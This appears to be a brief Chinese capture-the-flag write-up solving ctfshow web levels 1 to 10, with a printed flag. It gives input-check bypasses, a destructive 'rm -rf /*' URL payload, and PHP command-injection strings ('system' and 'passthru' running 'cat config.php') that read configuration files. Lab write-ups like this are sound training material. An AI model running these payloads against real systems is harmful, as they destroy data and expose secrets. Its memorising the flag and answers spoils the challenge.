web1
这题启动环境之后我们先对代码进行审计
可以得知如果id请求大于999就会报错
那我们就让他进行运算
加号不起作用就换成url编码%2b
得到flag ctfshow{8e0fd5cd-08a2-4311-9822-1012899739a9}
web2
这次对加号进行了过滤
那我们就用乘号
web3
直接~~1000秒了
web4
~~1000又能把这题给吃了
web5
你敢想吗
~~1000又把这题秒了
web6
我靠了,~~1000再次给秒了
~~1000再次创造神话,完事我也懒写了我们就看看他能杀到第几关
web7
到这里就不行了,盖了帽了。
我们先对代码进行审计
直接二进制参数绕过算了
?id=0b1111101000
web8
这次阿呆这个天才删库跑路了
接着我们对代码进行审计
直接构造payload吧 ?flag=rm -rf% /*
web9
?c=system('cat config.php'); 然后查看源代码
web10
?c=passthru('cat config.php');查看源代码